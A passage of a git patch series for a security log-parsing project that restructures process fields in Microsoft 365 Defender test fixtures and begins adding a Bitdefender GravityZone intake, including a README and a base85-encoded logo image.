+      "working_directory": "c:\\users\\USER\\appdata\\local\\google\\chrome\\user data\\swreporter\\102.286.200"
     },
     "related": {
+      "hash": [
+        "44543e0c6f30415c670c1322e61ca68602d58708",
+        "51a9cac9c4e8da44ffd7502be17604ee",
+        "6fe5e57df8d132eaf06f9134461dd172e36cf01679f13eb0f6e70c1f21b18323"
+      ],
       "ip": [
         "1.2.3.4",
         "5.6.7.8"
diff --git a/Microsoft/microsoft-365-defender/tests/test_device_process_created.json b/Microsoft/microsoft-365-defender/tests/test_device_process_created.json
index 7acf31f01..cd2ca7981 100644
--- a/Microsoft/microsoft-365-defender/tests/test_device_process_created.json
+++ b/Microsoft/microsoft-365-defender/tests/test_device_process_created.json
@@ -29,11 +29,9 @@
       }
     },
     "process": {
-      "parent": {
-        "user": {
-          "domain": "autorite nt",
-          "name": "syst\u00e8me"
-        }
+      "user": {
+        "domain": "autorite nt",
+        "name": "syst\u00e8me"
       }
     }
   }
diff --git a/Microsoft/microsoft-365-defender/tests/test_device_process_events.json b/Microsoft/microsoft-365-defender/tests/test_device_process_events.json
index 5d3587480..7d72e6264 100644
--- a/Microsoft/microsoft-365-defender/tests/test_device_process_events.json
+++ b/Microsoft/microsoft-365-defender/tests/test_device_process_events.json
@@ -74,32 +74,33 @@
         "subject_name": "OsVendor"
       },
       "command_line": "\"MpCmdRun.exe\" Scan -ScheduleJob -RestrictPrivileges -DailyScan -ScanTrigger 54",
-      "executable": "C:\\ProgramData\\Microsoft\\Windows Defender\\Platform\\4.18.2301.6-0\\MpCmdRun.exe",
+      "executable": "c:\\programdata\\microsoft\\windows defender\\platform\\4.18.2301.6-0\\msmpeng.exe",
       "hash": {
-        "md5": "17bd5d291205f95eb9ede9e75d5641d7",
-        "sha1": "81ea1283c9c328fef3ea93e92dc827f1280b32aa",
-        "sha256": "60d88450bc4d6e9bcb83fbcd0342376694dc55eb8f40b0f79580d1df399a7bdf"
+        "md5": "5d5608654828cf052ba013b3c37cbb61",
+        "sha1": "5bfbb0f965e2761d75a51faacc9db6a146a7c5ae",
+        "sha256": "52bd0a4d149f7913b9c3ba111eff1e75188abfcdc54b927390bc3bfad419860e"
       },
-      "name": "MpCmdRun.exe",
+      "name": "MsMpEng.exe",
       "parent": {
-        "command_line": "\"MsMpEng.exe\"",
-        "executable": "c:\\programdata\\microsoft\\windows defender\\platform\\4.18.2301.6-0\\msmpeng.exe",
-        "name": "MsMpEng.exe",
-        "pid": 5456,
-        "start": "2023-01-03T08:51:29.269279Z",
-        "user": {
-          "domain": "NT",
-          "id": "S-1-1-11",
-          "name": "System"
-        },
-        "working_directory": "c:\\programdata\\microsoft\\windows defender\\platform\\4.18.2301.6-0"
+        "name": "services.exe",
+        "pid": 1032,
+        "start": "2023-01-03T08:51:26.740241Z"
       },
       "pid": 37788,
-      "start": "2023-01-04T14:15:10.355033Z"
+      "start": "2023-01-04T14:15:10.355033Z",
+      "user": {
+        "domain": "NT",
+        "id": "S-1-1-11",
+        "name": "System"
+      },
+      "working_directory": "c:\\programdata\\microsoft\\windows defender\\platform\\4.18.2301.6-0"
     },
     "related": {
       "hash": [
         "17bd5d291205f95eb9ede9e75d5641d7",
+        "52bd0a4d149f7913b9c3ba111eff1e75188abfcdc54b927390bc3bfad419860e",
+        "5bfbb0f965e2761d75a51faacc9db6a146a7c5ae",
+        "5d5608654828cf052ba013b3c37cbb61",
         "60d88450bc4d6e9bcb83fbcd0342376694dc55eb8f40b0f79580d1df399a7bdf",
         "81ea1283c9c328fef3ea93e92dc827f1280b32aa"
       ],
diff --git a/Microsoft/microsoft-365-defender/tests/test_local_ip.json b/Microsoft/microsoft-365-defender/tests/test_local_ip.json
index 854ddd181..3cedbfdb3 100644
--- a/Microsoft/microsoft-365-defender/tests/test_local_ip.json
+++ b/Microsoft/microsoft-365-defender/tests/test_local_ip.json
@@ -49,20 +49,35 @@
         "--sandboxed-process-id=2",
         "--use-crash-handler-with-id=\"\\\\.\\pipe\\crashpad_11111_XXXXXXXXXXXXXXXX\""
       ],
+      "command_line": "\"software_reporter_tool.exe\" --use-crash-handler-with-id=\"\\\\.\\pipe\\crashpad_11111_XXXXXXXXXXXXXXXX\" --sandboxed-process-id=2 --init-done-notifier=804 --sandbox-mojo-pipe-token=********** --mojo-platform-channel-handle=780 --engine=2",
+      "executable": "c:\\users\\USER\\appdata\\local\\google\\chrome\\user data\\swreporter\\102.286.200\\software_reporter_tool.exe",
+      "hash": {
+        "md5": "51a9cac9c4e8da44ffd7502be17604ee",
+        "sha1": "44543e0c6f30415c670c1322e61ca68602d58708",
+        "sha256": "6fe5e57df8d132eaf06f9134461dd172e36cf01679f13eb0f6e70c1f21b18323"
+      },
+      "name": "software_reporter_tool.exe",
       "parent": {
-        "command_line": "\"software_reporter_tool.exe\" --use-crash-handler-with-id=\"\\\\.\\pipe\\crashpad_11111_XXXXXXXXXXXXXXXX\" --sandboxed-process-id=2 --init-done-notifier=804 --sandbox-mojo-pipe-token=********** --mojo-platform-channel-handle=780 --engine=2",
-        "executable": "c:\\users\\USER\\appdata\\local\\google\\chrome\\user data\\swreporter\\102.286.200\\software_reporter_tool.exe",
         "name": "software_reporter_tool.exe",
-        "pid": 1664,
-        "start": "2022-09-01T06:56:23.788784Z",
-        "user": {
-          "domain": "intranet",
-          "email": "user@example.org",
-          "id": "S-1-00-1-1111111-2222222222-3333333333-4444444444",
-          "name": "group1"
-        },
-        "working_directory": "c:\\users\\USER\\appdata\\local\\google\\chrome\\user data\\swreporter\\102.286.200"
-      }
+        "pid": 15532,
+        "start": "2022-09-01T06:56:23.595229Z"
+      },
+      "pid": 1664,
+      "start": "2022-09-01T06:56:23.788784Z",
+      "user": {
+        "domain": "intranet",
+        "email": "user@example.org",
+        "id": "S-1-00-1-1111111-2222222222-3333333333-4444444444",
+        "name": "group1"
+      },
+      "working_directory": "c:\\users\\USER\\appdata\\local\\google\\chrome\\user data\\swreporter\\102.286.200"
+    },
+    "related": {
+      "hash": [
+        "44543e0c6f30415c670c1322e61ca68602d58708",
+        "51a9cac9c4e8da44ffd7502be17604ee",
+        "6fe5e57df8d132eaf06f9134461dd172e36cf01679f13eb0f6e70c1f21b18323"
+      ]
     }
   }
 }
\ No newline at end of file
diff --git a/Microsoft/microsoft-365-defender/tests/test_process_error.json b/Microsoft/microsoft-365-defender/tests/test_process_error.json
index c1b661620..3a5d48cd4 100644
--- a/Microsoft/microsoft-365-defender/tests/test_process_error.json
+++ b/Microsoft/microsoft-365-defender/tests/test_process_error.json
@@ -60,32 +60,33 @@
         "subject_name": "Unknown"
       },
       "command_line": "grep -F smtpd_tls_protocols\\commandtest",
-      "executable": "/usr/bin/grep",
+      "executable": "/usr/test/platform-python3.6",
       "hash": {
-        "md5": "ff000000000aaaaaaaaaffb100000c0fb25ccccc6",
-        "sha1": "ff000000000aaaaaaaaaffb100000c0fb25ccccc6",
-        "sha256": "8def33333333643356354032379388263138839b9503f269f82e978413d669a0"
+        "md5": "eeeee2999444ddaaaaa08598b06eafe7",
+        "sha1": "ff77777000aaaaaaaaaffb100000c0fb25ccccc6",
+        "sha256": "3aa8333873527333382433308d52333230354923305566335f7e9f0a732ea565"
       },
-      "name": "grep",
+      "name": "platform-python3.6",
       "parent": {
-        "command_line": "/usr/test/platform-python /usr/lib/python3.6/run.py --register",
-        "executable": "/usr/test/platform-python3.6",
         "name": "platform-python3.6",
-        "pid": 408996,
-        "start": "2024-09-24T14:18:11.850000Z",
-        "user": {
-          "domain": "testdomain",
-          "name": "testaccount"
-        },
-        "working_directory": "/usr/test"
+        "pid": 408229,
+        "start": "2024-09-24T14:17:34.790000Z"
       },
       "pid": 408996,
-      "start": "2024-09-24T14:18:11.864114Z"
+      "start": "2024-09-24T14:18:11.864114Z",
+      "user": {
+        "domain": "testdomain",
+        "name": "testaccount"
+      },
+      "working_directory": "/usr/test"
     },
     "related": {
       "hash": [
+        "3aa8333873527333382433308d52333230354923305566335f7e9f0a732ea565",
         "8def33333333643356354032379388263138839b9503f269f82e978413d669a0",
-        "ff000000000aaaaaaaaaffb100000c0fb25ccccc6"
+        "eeeee2999444ddaaaaa08598b06eafe7",
+        "ff000000000aaaaaaaaaffb100000c0fb25ccccc6",
+        "ff77777000aaaaaaaaaffb100000c0fb25ccccc6"
       ],
       "user": [
         "testaccount"

From 3460f4e2303c14bcc8d6cc608f63fa3d84f71058 Mon Sep 17 00:00:00 2001
From: "vladyslav.guriev" <vladyslav.guriev@gmail.com>
Date: Tue, 22 Oct 2024 13:12:07 +0300
Subject: [PATCH 164/317] Feature: Bitdefender GravityZone

---
 Bitdefender/README.md                         |   9 ++
 Bitdefender/_meta/logo.png                    | Bin 0 -> 30360 bytes
 Bitdefender/_meta/manifest.yml                |   5 +
 Bitdefender/gravityzone/CHANGELOG.md          |   8 ++
 Bitdefender/gravityzone/_meta/fields.yml      |   9 ++
 Bitdefender/gravityzone/_meta/logo.png        | Bin 0 -> 30360 bytes
 Bitdefender/gravityzone/_meta/manifest.yml    |  11 ++
 .../gravityzone/_meta/smart-descriptions.json | 125 ++++++++++++++++++
 Bitdefender/gravityzone/ingest/parser.yml     | 111 ++++++++++++++++
 .../gravityzone/tests/antimalware_1.json      |  56 ++++++++
 .../gravityzone/tests/antimalware_2.json      |  59 +++++++++
 Bitdefender/gravityzone/tests/login_1.json    |  35 +++++
 12 files changed, 428 insertions(+)
 create mode 100644 Bitdefender/README.md
 create mode 100644 Bitdefender/_meta/logo.png
 create mode 100644 Bitdefender/_meta/manifest.yml
 create mode 100644 Bitdefender/gravityzone/CHANGELOG.md
 create mode 100644 Bitdefender/gravityzone/_meta/fields.yml
 create mode 100644 Bitdefender/gravityzone/_meta/logo.png
 create mode 100644 Bitdefender/gravityzone/_meta/manifest.yml
 create mode 100644 Bitdefender/gravityzone/_meta/smart-descriptions.json
 create mode 100644 Bitdefender/gravityzone/ingest/parser.yml
 create mode 100644 Bitdefender/gravityzone/tests/antimalware_1.json
 create mode 100644 Bitdefender/gravityzone/tests/antimalware_2.json
 create mode 100644 Bitdefender/gravityzone/tests/login_1.json

diff --git a/Bitdefender/README.md b/Bitdefender/README.md
new file mode 100644
index 000000000..3a7c39a3e
--- /dev/null
+++ b/Bitdefender/README.md
@@ -0,0 +1,9 @@
+# Bitdefender
+
+## Description
+
+Bitdefender is a global cybersecurity company renowned for its advanced antivirus software, providing comprehensive security solutions and threat intelligence for individuals and enterprises, safeguarding against evolving cyber threats.
+
+## Intakes
+
+- [GravityZone](./gravityzone/CHANGELOG.md)
diff --git a/Bitdefender/_meta/logo.png b/Bitdefender/_meta/logo.png
new file mode 100644
index 0000000000000000000000000000000000000000..dd360bce9b147401e7cd703dde3e550bf835be78
GIT binary patch
literal 30360
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
